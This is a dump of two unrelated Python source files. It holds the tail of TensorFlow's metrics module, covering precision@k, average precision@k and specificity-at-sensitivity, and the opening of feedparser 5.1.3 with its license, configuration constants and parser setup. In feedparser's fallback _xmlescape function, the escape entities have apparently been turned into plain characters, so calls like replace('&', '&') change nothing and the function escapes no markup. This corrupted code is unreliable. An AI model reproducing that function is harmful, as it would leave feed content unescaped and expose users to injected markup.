[0, num_classes).
Returns:
`float64` `Tensor` of shape [D1, ... DN], where each value is the average
precision for that row.
Raises:
ValueError: if the last dimension of predictions_idx is not set.
"""
with ops.name_scope(None, 'average_precision',
(predictions_idx, labels)) as scope:
predictions_idx = math_ops.to_int64(predictions_idx, name='predictions_idx')
if predictions_idx.get_shape().ndims == 0:
raise ValueError('The rank of predictions_idx must be at least 1.')
k = predictions_idx.get_shape().as_list()[-1]
if k is None:
raise ValueError('The last dimension of predictions_idx must be set.')
labels = _maybe_expand_labels(labels, predictions_idx)
# Expand dims to produce [D1, ... DN, k, 1] tensor. This gives us a separate
# prediction for each k, so we can calculate separate true positive values
# for each k.
predictions_idx_per_k = array_ops.expand_dims(
predictions_idx, -1, name='predictions_idx_per_k')
# Replicate labels k times to produce [D1, ... DN, k, num_labels] tensor.
labels_per_k = _expand_and_tile(
labels, multiple=k, dim=-1, name='labels_per_k')
# The following tensors are all of shape [D1, ... DN, k], containing values
# per row, per k value.
# `relevant_per_k` (int32) - Relevance indicator, 1 if the prediction at
# that k value is correct, 0 otherwise. This is the "rel_{i}" term from
# the formula above.
# `tp_per_k` (int32) - True positive counts.
# `retrieved_per_k` (int32) - Number of predicted values at each k. This is
# the precision denominator.
# `precision_per_k` (float64) - Precision at each k. This is the "P_{i}"
# term from the formula above.
# `relevant_precision_per_k` (float64) - Relevant precisions; i.e.,
# precisions at all k for which relevance indicator is true.
relevant_per_k = _sparse_true_positive_at_k(
labels_per_k, predictions_idx_per_k, name='relevant_per_k')
tp_per_k = math_ops.cumsum(relevant_per_k, axis=-1, name='tp_per_k')
retrieved_per_k = math_ops.cumsum(
array_ops.ones_like(relevant_per_k), axis=-1, name='retrieved_per_k')
precision_per_k = math_ops.div(
math_ops.to_double(tp_per_k),
math_ops.to_double(retrieved_per_k),
name='precision_per_k')
relevant_precision_per_k = math_ops.multiply(
precision_per_k,
math_ops.to_double(relevant_per_k),
name='relevant_precision_per_k')
# Reduce along k dimension to get the sum, yielding a [D1, ... DN] tensor.
precision_sum = math_ops.reduce_sum(
relevant_precision_per_k, reduction_indices=(-1,), name='precision_sum')
# Divide by number of relevant items to get average precision. These are
# the "num_relevant_items" and "AveP" terms from the formula above.
num_relevant_items = math_ops.to_double(_num_relevant(labels, k))
return math_ops.div(precision_sum, num_relevant_items, name=scope)
def _streaming_sparse_average_precision_at_top_k(labels,
predictions_idx,
weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Computes average precision@k of predictions with respect to sparse labels.
`sparse_average_precision_at_top_k` creates two local variables,
`average_precision_at_<k>/total` and `average_precision_at_<k>/max`, that
are used to compute the frequency. This frequency is ultimately returned as
`average_precision_at_<k>`: an idempotent operation that simply divides
`average_precision_at_<k>/total` by `average_precision_at_<k>/max`.
For estimation of the metric over a stream of data, the function creates an
`update_op` operation that updates these variables and returns the
`precision_at_<k>`. Set operations applied to `top_k` and `labels` calculate
the true positives and false positives weighted by `weights`. Then `update_op`
increments `true_positive_at_<k>` and `false_positive_at_<k>` using these
values.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: `int64` `Tensor` or `SparseTensor` with shape
[D1, ... DN, num_labels] or [D1, ... DN], where the latter implies
num_labels=1. N >= 1 and num_labels is the number of target classes for
the associated prediction. Commonly, N=1 and `labels` has shape
[batch_size, num_labels]. [D1, ... DN] must match `predictions_idx`.
Values should be in range [0, num_classes).
predictions_idx: Integer `Tensor` with shape [D1, ... DN, k] where N >= 1.
Commonly, N=1 and `predictions_idx` has shape [batch size, k]. The final
dimension contains the top `k` predicted class indices. [D1, ... DN] must
match `labels`. Values should be in range [0, num_classes).
weights: `Tensor` whose rank is either 0, or n-1, where n is the rank of
`labels`. If the latter, it must be broadcastable to `labels` (i.e., all
dimensions must be either `1`, or the same as the corresponding `labels`
dimension).
metrics_collections: An optional list of collections that values should
be added to.
updates_collections: An optional list of collections that updates should
be added to.
name: Name of new update operation, and namespace for other dependent ops.
Returns:
mean_average_precision: Scalar `float64` `Tensor` with the mean average
precision values.
update: `Operation` that increments variables appropriately, and whose
value matches `metric`.
"""
with ops.name_scope(name, 'average_precision_at_top_k',
(predictions_idx, labels, weights)) as scope:
# Calculate per-example average precision, and apply weights.
average_precision = _sparse_average_precision_at_top_k(
predictions_idx=predictions_idx, labels=labels)
if weights is not None:
weights = weights_broadcast_ops.broadcast_weights(
math_ops.to_double(weights), average_precision)
average_precision = math_ops.multiply(average_precision, weights)
# Create accumulation variables and update ops for max average precision and
# total average precision.
with ops.name_scope(None, 'max', (average_precision,)) as max_scope:
# `max` is the max possible precision. Since max for any row is 1.0:
# - For the unweighted case, this is just the number of rows.
# - For the weighted case, it's the sum of the weights broadcast across
# `average_precision` rows.
max_var = metric_variable([], dtypes.float64, name=max_scope)
if weights is None:
batch_max = math_ops.to_double(
array_ops.size(average_precision, name='batch_max'))
else:
batch_max = math_ops.reduce_sum(weights, name='batch_max')
max_update = state_ops.assign_add(max_var, batch_max, name='update')
with ops.name_scope(None, 'total', (average_precision,)) as total_scope:
total_var = metric_variable([], dtypes.float64, name=total_scope)
batch_total = math_ops.reduce_sum(average_precision, name='batch_total')
total_update = state_ops.assign_add(total_var, batch_total, name='update')
# Divide total by max to get mean, for both vars and the update ops.
def precision_across_replicas(_, total_var, max_var):
return _safe_scalar_div(total_var, max_var, name='mean')
mean_average_precision = _aggregate_across_replicas(
metrics_collections, precision_across_replicas, total_var, max_var)
update = _safe_scalar_div(total_update, max_update, name=scope)
if updates_collections:
ops.add_to_collections(updates_collections, update)
return mean_average_precision, update
@tf_export('metrics.sparse_average_precision_at_k')
@deprecated(None, 'Use average_precision_at_k instead')
def sparse_average_precision_at_k(labels,
predictions,
k,
weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Renamed to `average_precision_at_k`, please use that method instead."""
return average_precision_at_k(
labels=labels,
predictions=predictions,
k=k,
weights=weights,
metrics_collections=metrics_collections,
updates_collections=updates_collections,
name=name)
@tf_export('metrics.average_precision_at_k')
def average_precision_at_k(labels,
predictions,
k,
weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Computes average precision@k of predictions with respect to sparse labels.
`average_precision_at_k` creates two local variables,
`average_precision_at_<k>/total` and `average_precision_at_<k>/max`, that
are used to compute the frequency. This frequency is ultimately returned as
`average_precision_at_<k>`: an idempotent operation that simply divides
`average_precision_at_<k>/total` by `average_precision_at_<k>/max`.
For estimation of the metric over a stream of data, the function creates an
`update_op` operation that updates these variables and returns the
`precision_at_<k>`. Internally, a `top_k` operation computes a `Tensor`
indicating the top `k` `predictions`. Set operations applied to `top_k` and
`labels` calculate the true positives and false positives weighted by
`weights`. Then `update_op` increments `true_positive_at_<k>` and
`false_positive_at_<k>` using these values.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: `int64` `Tensor` or `SparseTensor` with shape
[D1, ... DN, num_labels] or [D1, ... DN], where the latter implies
num_labels=1. N >= 1 and num_labels is the number of target classes for
the associated prediction. Commonly, N=1 and `labels` has shape
[batch_size, num_labels]. [D1, ... DN] must match `predictions`. Values
should be in range [0, num_classes), where num_classes is the last
dimension of `predictions`. Values outside this range are ignored.
predictions: Float `Tensor` with shape [D1, ... DN, num_classes] where
N >= 1. Commonly, N=1 and `predictions` has shape
[batch size, num_classes]. The final dimension contains the logit values
for each class. [D1, ... DN] must match `labels`.
k: Integer, k for @k metric. This will calculate an average precision for
range `[1,k]`, as documented above.
weights: `Tensor` whose rank is either 0, or n-1, where n is the rank of
`labels`. If the latter, it must be broadcastable to `labels` (i.e., all
dimensions must be either `1`, or the same as the corresponding `labels`
dimension).
metrics_collections: An optional list of collections that values should
be added to.
updates_collections: An optional list of collections that updates should
be added to.
name: Name of new update operation, and namespace for other dependent ops.
Returns:
mean_average_precision: Scalar `float64` `Tensor` with the mean average
precision values.
update: `Operation` that increments variables appropriately, and whose
value matches `metric`.
Raises:
ValueError: if k is invalid.
RuntimeError: If eager execution is enabled.
"""
if context.executing_eagerly():
raise RuntimeError('tf.metrics.sparse_average_precision_at_k is not '
'supported when eager execution is enabled.')
if k < 1:
raise ValueError('Invalid k=%s.' % k)
with ops.name_scope(name, _at_k_name('average_precision', k),
(predictions, labels, weights)) as scope:
# Calculate top k indices to produce [D1, ... DN, k] tensor.
_, predictions_idx = nn.top_k(predictions, k)
return _streaming_sparse_average_precision_at_top_k(
labels=labels,
predictions_idx=predictions_idx,
weights=weights,
metrics_collections=metrics_collections,
updates_collections=updates_collections,
name=scope)
def _sparse_false_positive_at_k(labels,
predictions_idx,
class_id=None,
weights=None):
"""Calculates false positives for precision@k.
If `class_id` is specified, calculate binary true positives for `class_id`
only.
If `class_id` is not specified, calculate metrics for `k` predicted vs
`n` label classes, where `n` is the 2nd dimension of `labels_sparse`.
Args:
labels: `int64` `Tensor` or `SparseTensor` with shape
[D1, ... DN, num_labels], where N >= 1 and num_labels is the number of
target classes for the associated prediction. Commonly, N=1 and `labels`
has shape [batch_size, num_labels]. [D1, ... DN] must match
`predictions_idx`.
predictions_idx: 1-D or higher `int64` `Tensor` with last dimension `k`,
top `k` predicted classes. For rank `n`, the first `n-1` dimensions must
match `labels`.
class_id: Class for which we want binary metrics.
weights: `Tensor` whose rank is either 0, or n-1, where n is the rank of
`labels`. If the latter, it must be broadcastable to `labels` (i.e., all
dimensions must be either `1`, or the same as the corresponding `labels`
dimension).
Returns:
A [D1, ... DN] `Tensor` of false positive counts.
"""
with ops.name_scope(None, 'false_positives',
(predictions_idx, labels, weights)):
labels, predictions_idx = _maybe_select_class_id(labels, predictions_idx,
class_id)
fp = sets.set_size(
sets.set_difference(predictions_idx, labels, aminusb=True))
fp = math_ops.to_double(fp)
if weights is not None:
with ops.control_dependencies((weights_broadcast_ops.assert_broadcastable(
weights, fp),)):
weights = math_ops.to_double(weights)
fp = math_ops.multiply(fp, weights)
return fp
def _streaming_sparse_false_positive_at_k(labels,
predictions_idx,
k=None,
class_id=None,
weights=None,
name=None):
"""Calculates weighted per step false positives for precision@k.
If `class_id` is specified, calculate binary true positives for `class_id`
only.
If `class_id` is not specified, calculate metrics for `k` predicted vs
`n` label classes, where `n` is the 2nd dimension of `labels`.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: `int64` `Tensor` or `SparseTensor` with shape
[D1, ... DN, num_labels], where N >= 1 and num_labels is the number of
target classes for the associated prediction. Commonly, N=1 and `labels`
has shape [batch_size, num_labels]. [D1, ... DN] must match
`predictions_idx`.
predictions_idx: 1-D or higher `int64` `Tensor` with last dimension `k`,
top `k` predicted classes. For rank `n`, the first `n-1` dimensions must
match `labels`.
k: Integer, k for @k metric. This is only used for default op name.
class_id: Class for which we want binary metrics.
weights: `Tensor` whose rank is either 0, or n-1, where n is the rank of
`labels`. If the latter, it must be broadcastable to `labels` (i.e., all
dimensions must be either `1`, or the same as the corresponding `labels`
dimension).
name: Name of new variable, and namespace for other dependent ops.
Returns:
A tuple of `Variable` and update `Operation`.
Raises:
ValueError: If `weights` is not `None` and has an incompatible shape.
"""
with ops.name_scope(name, _at_k_name('false_positive', k, class_id=class_id),
(predictions_idx, labels, weights)) as scope:
fp = _sparse_false_positive_at_k(
predictions_idx=predictions_idx,
labels=labels,
class_id=class_id,
weights=weights)
batch_total_fp = math_ops.to_double(math_ops.reduce_sum(fp))
var = metric_variable([], dtypes.float64, name=scope)
return var, state_ops.assign_add(var, batch_total_fp, name='update')
@tf_export('metrics.precision_at_top_k')
def precision_at_top_k(labels,
predictions_idx,
k=None,
class_id=None,
weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Computes precision@k of the predictions with respect to sparse labels.
Differs from `sparse_precision_at_k` in that predictions must be in the form
of top `k` class indices, whereas `sparse_precision_at_k` expects logits.
Refer to `sparse_precision_at_k` for more details.
Args:
labels: `int64` `Tensor` or `SparseTensor` with shape
[D1, ... DN, num_labels] or [D1, ... DN], where the latter implies
num_labels=1. N >= 1 and num_labels is the number of target classes for
the associated prediction. Commonly, N=1 and `labels` has shape
[batch_size, num_labels]. [D1, ... DN] must match `predictions`. Values
should be in range [0, num_classes), where num_classes is the last
dimension of `predictions`. Values outside this range are ignored.
predictions_idx: Integer `Tensor` with shape [D1, ... DN, k] where
N >= 1. Commonly, N=1 and predictions has shape [batch size, k].
The final dimension contains the top `k` predicted class indices.
[D1, ... DN] must match `labels`.
k: Integer, k for @k metric. Only used for the default op name.
class_id: Integer class ID for which we want binary metrics. This should be
in range [0, num_classes], where num_classes is the last dimension of
`predictions`. If `class_id` is outside this range, the method returns
NAN.
weights: `Tensor` whose rank is either 0, or n-1, where n is the rank of
`labels`. If the latter, it must be broadcastable to `labels` (i.e., all
dimensions must be either `1`, or the same as the corresponding `labels`
dimension).
metrics_collections: An optional list of collections that values should
be added to.
updates_collections: An optional list of collections that updates should
be added to.
name: Name of new update operation, and namespace for other dependent ops.
Returns:
precision: Scalar `float64` `Tensor` with the value of `true_positives`
divided by the sum of `true_positives` and `false_positives`.
update_op: `Operation` that increments `true_positives` and
`false_positives` variables appropriately, and whose value matches
`precision`.
Raises:
ValueError: If `weights` is not `None` and its shape doesn't match
`predictions`, or if either `metrics_collections` or `updates_collections`
are not a list or tuple.
RuntimeError: If eager execution is enabled.
"""
if context.executing_eagerly():
raise RuntimeError('tf.metrics.precision_at_top_k is not '
'supported when eager execution is enabled.')
with ops.name_scope(name, _at_k_name('precision', k, class_id=class_id),
(predictions_idx, labels, weights)) as scope:
labels = _maybe_expand_labels(labels, predictions_idx)
top_k_idx = math_ops.to_int64(predictions_idx)
tp, tp_update = _streaming_sparse_true_positive_at_k(
predictions_idx=top_k_idx,
labels=labels,
k=k,
class_id=class_id,
weights=weights)
fp, fp_update = _streaming_sparse_false_positive_at_k(
predictions_idx=top_k_idx,
labels=labels,
k=k,
class_id=class_id,
weights=weights)
def precision_across_replicas(_, tp, fp):
return math_ops.div(tp, math_ops.add(tp, fp), name=scope)
metric = _aggregate_across_replicas(
metrics_collections, precision_across_replicas, tp, fp)
update = math_ops.div(
tp_update, math_ops.add(tp_update, fp_update), name='update')
if updates_collections:
ops.add_to_collections(updates_collections, update)
return metric, update
@tf_export('metrics.sparse_precision_at_k')
@deprecated(None, 'Use precision_at_k instead')
def sparse_precision_at_k(labels,
predictions,
k,
class_id=None,
weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Renamed to `precision_at_k`, please use that method instead."""
return precision_at_k(
labels=labels,
predictions=predictions,
k=k,
class_id=class_id,
weights=weights,
metrics_collections=metrics_collections,
updates_collections=updates_collections,
name=name)
@tf_export('metrics.precision_at_k')
def precision_at_k(labels,
predictions,
k,
class_id=None,
weights=None,
metrics_collections=None,
updates_collections=None,
name=None):
"""Computes precision@k of the predictions with respect to sparse labels.
If `class_id` is specified, we calculate precision by considering only the
entries in the batch for which `class_id` is in the top-k highest
`predictions`, and computing the fraction of them for which `class_id` is
indeed a correct label.
If `class_id` is not specified, we'll calculate precision as how often on
average a class among the top-k classes with the highest predicted values
of a batch entry is correct and can be found in the label for that entry.
`precision_at_k` creates two local variables,
`true_positive_at_<k>` and `false_positive_at_<k>`, that are used to compute
the precision@k frequency. This frequency is ultimately returned as
`precision_at_<k>`: an idempotent operation that simply divides
`true_positive_at_<k>` by total (`true_positive_at_<k>` +
`false_positive_at_<k>`).
For estimation of the metric over a stream of data, the function creates an
`update_op` operation that updates these variables and returns the
`precision_at_<k>`. Internally, a `top_k` operation computes a `Tensor`
indicating the top `k` `predictions`. Set operations applied to `top_k` and
`labels` calculate the true positives and false positives weighted by
`weights`. Then `update_op` increments `true_positive_at_<k>` and
`false_positive_at_<k>` using these values.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
Args:
labels: `int64` `Tensor` or `SparseTensor` with shape
[D1, ... DN, num_labels] or [D1, ... DN], where the latter implies
num_labels=1. N >= 1 and num_labels is the number of target classes for
the associated prediction. Commonly, N=1 and `labels` has shape
[batch_size, num_labels]. [D1, ... DN] must match `predictions`. Values
should be in range [0, num_classes), where num_classes is the last
dimension of `predictions`. Values outside this range are ignored.
predictions: Float `Tensor` with shape [D1, ... DN, num_classes] where
N >= 1. Commonly, N=1 and predictions has shape [batch size, num_classes].
The final dimension contains the logit values for each class. [D1, ... DN]
must match `labels`.
k: Integer, k for @k metric.
class_id: Integer class ID for which we want binary metrics. This should be
in range [0, num_classes], where num_classes is the last dimension of
`predictions`. If `class_id` is outside this range, the method returns
NAN.
weights: `Tensor` whose rank is either 0, or n-1, where n is the rank of
`labels`. If the latter, it must be broadcastable to `labels` (i.e., all
dimensions must be either `1`, or the same as the corresponding `labels`
dimension).
metrics_collections: An optional list of collections that values should
be added to.
updates_collections: An optional list of collections that updates should
be added to.
name: Name of new update operation, and namespace for other dependent ops.
Returns:
precision: Scalar `float64` `Tensor` with the value of `true_positives`
divided by the sum of `true_positives` and `false_positives`.
update_op: `Operation` that increments `true_positives` and
`false_positives` variables appropriately, and whose value matches
`precision`.
Raises:
ValueError: If `weights` is not `None` and its shape doesn't match
`predictions`, or if either `metrics_collections` or `updates_collections`
are not a list or tuple.
RuntimeError: If eager execution is enabled.
"""
if context.executing_eagerly():
raise RuntimeError('tf.metrics.sparse_precision_at_k is not '
'supported when eager execution is enabled.')
with ops.name_scope(name, _at_k_name('precision', k, class_id=class_id),
(predictions, labels, weights)) as scope:
_, top_k_idx = nn.top_k(predictions, k)
return precision_at_top_k(
labels=labels,
predictions_idx=top_k_idx,
k=k,
class_id=class_id,
weights=weights,
metrics_collections=metrics_collections,
updates_collections=updates_collections,
name=scope)
@tf_export('metrics.specificity_at_sensitivity')
def specificity_at_sensitivity(labels,
predictions,
sensitivity,
weights=None,
num_thresholds=200,
metrics_collections=None,
updates_collections=None,
name=None):
"""Computes the specificity at a given sensitivity.
The `specificity_at_sensitivity` function creates four local
variables, `true_positives`, `true_negatives`, `false_positives` and
`false_negatives` that are used to compute the specificity at the given
sensitivity value. The threshold for the given sensitivity value is computed
and used to evaluate the corresponding specificity.
For estimation of the metric over a stream of data, the function creates an
`update_op` operation that updates these variables and returns the
`specificity`. `update_op` increments the `true_positives`, `true_negatives`,
`false_positives` and `false_negatives` counts with the weight of each case
found in the `predictions` and `labels`.
If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.
For additional information about specificity and sensitivity, see the
following: https://en.wikipedia.org/wiki/Sensitivity_and_specificity
Args:
labels: The ground truth values, a `Tensor` whose dimensions must match
`predictions`. Will be cast to `bool`.
predictions: A floating point `Tensor` of arbitrary shape and whose values
are in the range `[0, 1]`.
sensitivity: A scalar value in range `[0, 1]`.
weights: Optional `Tensor` whose rank is either 0, or the same rank as
`labels`, and must be broadcastable to `labels` (i.e., all dimensions must
be either `1`, or the same as the corresponding `labels` dimension).
num_thresholds: The number of thresholds to use for matching the given
sensitivity.
metrics_collections: An optional list of collections that `specificity`
should be added to.
updates_collections: An optional list of collections that `update_op` should
be added to.
name: An optional variable_scope name.
Returns:
specificity: A scalar `Tensor` representing the specificity at the given
`specificity` value.
update_op: An operation that increments the `true_positives`,
`true_negatives`, `false_positives` and `false_negatives` variables
appropriately and whose value matches `specificity`.
Raises:
ValueError: If `predictions` and `labels` have mismatched shapes, if
`weights` is not `None` and its shape doesn't match `predictions`, or if
`sensitivity` is not between 0 and 1, or if either `metrics_collections`
or `updates_collections` are not a list or tuple.
RuntimeError: If eager execution is enabled.
"""
if context.executing_eagerly():
raise RuntimeError('tf.metrics.specificity_at_sensitivity is not '
'supported when eager execution is enabled.')
if sensitivity < 0 or sensitivity > 1:
raise ValueError('`sensitivity` must be in the range [0, 1].')
with variable_scope.variable_scope(name, 'specificity_at_sensitivity',
(predictions, labels, weights)):
kepsilon = 1e-7 # to account for floating point imprecisions
thresholds = [
(i + 1) * 1.0 / (num_thresholds - 1) for i in range(num_thresholds - 2)
]
thresholds = [0.0 - kepsilon] + thresholds + [1.0 - kepsilon]
values, update_ops = _confusion_matrix_at_thresholds(
labels, predictions, thresholds, weights)
def compute_specificity_at_sensitivity(tp, tn, fp, fn, name):
"""Computes the specificity at the given sensitivity.
Args:
tp: True positives.
tn: True negatives.
fp: False positives.
fn: False negatives.
name: The name of the operation.
Returns:
The specificity using the aggregated values.
"""
sensitivities = math_ops.div(tp, tp + fn + kepsilon)
# We'll need to use this trick until tf.argmax allows us to specify
# whether we should use the first or last index in case of ties.
min_val = math_ops.reduce_min(math_ops.abs(sensitivities - sensitivity))
indices_at_minval = math_ops.equal(
math_ops.abs(sensitivities - sensitivity), min_val)
indices_at_minval = math_ops.to_int64(indices_at_minval)
indices_at_minval = math_ops.cumsum(indices_at_minval)
tf_index = math_ops.argmax(indices_at_minval, 0)
tf_index = math_ops.cast(tf_index, dtypes.int32)
# Now, we have the implicit threshold, so compute the specificity:
return math_ops.div(tn[tf_index], tn[tf_index] + fp[tf_index] + kepsilon,
name)
def specificity_across_replicas(_, values):
return compute_specificity_at_sensitivity(
values['tp'], values['tn'], values['fp'], values['fn'], 'value')
specificity = _aggregate_across_replicas(
metrics_collections, specificity_across_replicas, values)
update_op = compute_specificity_at_sensitivity(
update_ops['tp'], update_ops['tn'], update_ops['fp'], update_ops['fn'],
'update_op')
if updates_collections:
ops.add_to_collections(updates_collections, update_op)
return specificity, update_op
|
unknown
|
codeparrot/codeparrot-clean
| ||
"""Universal feed parser
Handles RSS 0.9x, RSS 1.0, RSS 2.0, CDF, Atom 0.3, and Atom 1.0 feeds
Visit https://code.google.com/p/feedparser/ for the latest version
Visit http://packages.python.org/feedparser/ for the latest documentation
Required: Python 2.4 or later
Recommended: iconv_codec <http://cjkpython.i18n.org/>
"""
__version__ = "5.1.3"
__license__ = """
Copyright (c) 2010-2013 Kurt McKee <contactme@kurtmckee.org>
Copyright (c) 2002-2008 Mark Pilgrim
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 'AS IS'
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE."""
__author__ = "Mark Pilgrim <http://diveintomark.org/>"
__contributors__ = ["Jason Diamond <http://injektilo.org/>",
"John Beimler <http://john.beimler.org/>",
"Fazal Majid <http://www.majid.info/mylos/weblog/>",
"Aaron Swartz <http://aaronsw.com/>",
"Kevin Marks <http://epeus.blogspot.com/>",
"Sam Ruby <http://intertwingly.net/>",
"Ade Oshineye <http://blog.oshineye.com/>",
"Martin Pool <http://sourcefrog.net/>",
"Kurt McKee <http://kurtmckee.org/>",
"Bernd Schlapsi <https://github.com/brot>",]
# HTTP "User-Agent" header to send to servers when downloading feeds.
# If you are embedding feedparser in a larger application, you should
# change this to your application name and URL.
USER_AGENT = "UniversalFeedParser/%s +https://code.google.com/p/feedparser/" % __version__
# HTTP "Accept" header to send to servers when downloading feeds. If you don't
# want to send an Accept header, set this to None.
ACCEPT_HEADER = "application/atom+xml,application/rdf+xml,application/rss+xml,application/x-netcdf,application/xml;q=0.9,text/xml;q=0.2,*/*;q=0.1"
# List of preferred XML parsers, by SAX driver name. These will be tried first,
# but if they're not installed, Python will keep searching through its own list
# of pre-installed parsers until it finds one that supports everything we need.
PREFERRED_XML_PARSERS = ["drv_libxml2"]
# If you want feedparser to automatically resolve all relative URIs, set this
# to 1.
RESOLVE_RELATIVE_URIS = 1
# If you want feedparser to automatically sanitize all potentially unsafe
# HTML content, set this to 1.
SANITIZE_HTML = 1
# ---------- Python 3 modules (make it work if possible) ----------
try:
import rfc822
except ImportError:
from email import _parseaddr as rfc822
#try:
# # Python 3.1 introduces bytes.maketrans and simultaneously
# # deprecates string.maketrans; use bytes.maketrans if possible
# _maketrans = bytes.maketrans
#except (NameError, AttributeError):
import string
_maketrans = string.maketrans
# base64 support for Atom feeds that contain embedded binary data
try:
import base64, binascii
except ImportError:
base64 = binascii = None
else:
# Python 3.1 deprecates decodestring in favor of decodebytes
#_base64decode = getattr(base64, 'decodebytes', base64.decodestring)
_base64decode = base64.decodestring
# _s2bytes: convert a UTF-8 str to bytes if the interpreter is Python 3
# _l2bytes: convert a list of ints to bytes if the interpreter is Python 3
#try:
# if bytes is str:
# # In Python 2.5 and below, bytes doesn't exist (NameError)
# # In Python 2.6 and above, bytes and str are the same type
# raise NameError
#except NameError:
# Python 2
def _s2bytes(s):
return s
def _l2bytes(l):
return ''.join(map(chr, l))
#else:
# # Python 3
# def _s2bytes(s):
# return bytes(s, 'utf8')
# def _l2bytes(l):
# return bytes(l)
# If you want feedparser to allow all URL schemes, set this to ()
# List culled from Python's urlparse documentation at:
# http://docs.python.org/library/urlparse.html
# as well as from "URI scheme" at Wikipedia:
# https://secure.wikimedia.org/wikipedia/en/wiki/URI_scheme
# Many more will likely need to be added!
ACCEPTABLE_URI_SCHEMES = (
'file', 'ftp', 'gopher', 'h323', 'hdl', 'http', 'https', 'imap', 'magnet',
'mailto', 'mms', 'news', 'nntp', 'prospero', 'rsync', 'rtsp', 'rtspu',
'sftp', 'shttp', 'sip', 'sips', 'snews', 'svn', 'svn+ssh', 'telnet',
'wais',
# Additional common-but-unofficial schemes
'aim', 'callto', 'cvs', 'facetime', 'feed', 'git', 'gtalk', 'irc', 'ircs',
'irc6', 'itms', 'mms', 'msnim', 'skype', 'ssh', 'smb', 'svn', 'ymsg',
)
#ACCEPTABLE_URI_SCHEMES = ()
# ---------- required modules (should come with any Python distribution) ----------
import cgi
import codecs
import copy
import datetime
import itertools
import re
import struct
import time
import types
import urllib
import urllib2
import urlparse
import warnings
from htmlentitydefs import name2codepoint, codepoint2name, entitydefs
try:
from io import BytesIO as _StringIO
except ImportError:
try:
from cStringIO import StringIO as _StringIO
except ImportError:
from StringIO import StringIO as _StringIO
# ---------- optional modules (feedparser will work without these, but with reduced functionality) ----------
# gzip is included with most Python distributions, but may not be available if you compiled your own
try:
import gzip
except ImportError:
gzip = None
try:
import zlib
except ImportError:
zlib = None
# If a real XML parser is available, feedparser will attempt to use it. feedparser has
# been tested with the built-in SAX parser and libxml2. On platforms where the
# Python distribution does not come with an XML parser (such as Mac OS X 10.2 and some
# versions of FreeBSD), feedparser will quietly fall back on regex-based parsing.
try:
import xml.sax
from xml.sax.saxutils import escape as _xmlescape
except ImportError:
_XML_AVAILABLE = 0
def _xmlescape(data,entities={}):
data = data.replace('&', '&')
data = data.replace('>', '>')
data = data.replace('<', '<')
for char, entity in entities:
data = data.replace(char, entity)
return data
else:
try:
xml.sax.make_parser(PREFERRED_XML_PARSERS) # test for valid parsers
except xml.sax.SAXReaderNotAvailable:
_XML_AVAILABLE = 0
else:
_XML_AVAILABLE = 1
# sgmllib is not available by default in Python 3; if the end user doesn't have
# it available then we'll lose illformed XML parsing and content santizing
try:
import sgmllib
except ImportError:
# This is probably Python 3, which doesn't include sgmllib anymore
_SGML_AVAILABLE = 0
# Mock sgmllib enough to allow subclassing later on
class sgmllib(object):
class SGMLParser(object):
def goahead(self, i):
pass
def parse_starttag(self, i):
pass
else:
_SGML_AVAILABLE = 1
# sgmllib defines a number of module-level regular expressions that are
# insufficient for the XML parsing feedparser needs. Rather than modify
# the variables directly in sgmllib, they're defined here using the same
# names, and the compiled code objects of several sgmllib.SGMLParser
# methods are copied into _BaseHTMLProcessor so that they execute in
# feedparser's scope instead of sgmllib's scope.
charref = re.compile('&#(\d+|[xX][0-9a-fA-F]+);')
tagfind = re.compile('[a-zA-Z][-_.:a-zA-Z0-9]*')
attrfind = re.compile(
r'\s*([a-zA-Z_][-:.a-zA-Z_0-9]*)[$]?(\s*=\s*'
r'(\'[^\']*\'|"[^"]*"|[][\-a-zA-Z0-9./,:;+*%?!&$\(\)_#=~\'"@]*))?'
)
# Unfortunately, these must be copied over to prevent NameError exceptions
entityref = sgmllib.entityref
incomplete = sgmllib.incomplete
interesting = sgmllib.interesting
shorttag = sgmllib.shorttag
shorttagopen = sgmllib.shorttagopen
starttagopen = sgmllib.starttagopen
class _EndBracketRegEx:
def __init__(self):
# Overriding the built-in sgmllib.endbracket regex allows the
# parser to find angle brackets embedded in element attributes.
self.endbracket = re.compile('''([^'"<>]|"[^"]*"(?=>|/|\s|\w+=)|'[^']*'(?=>|/|\s|\w+=))*(?=[<>])|.*?(?=[<>])''')
def search(self, target, index=0):
match = self.endbracket.match(target, index)
if match is not None:
# Returning a new object in the calling thread's context
# resolves a thread-safety.
return EndBracketMatch(match)
return None
class EndBracketMatch:
def __init__(self, match):
self.match = match
def start(self, n):
return self.match.end(n)
endbracket = _EndBracketRegEx()
# iconv_codec provides support for more character encodings.
# It's available from http://cjkpython.i18n.org/
#try:
# import iconv_codec
#except ImportError:
# pass
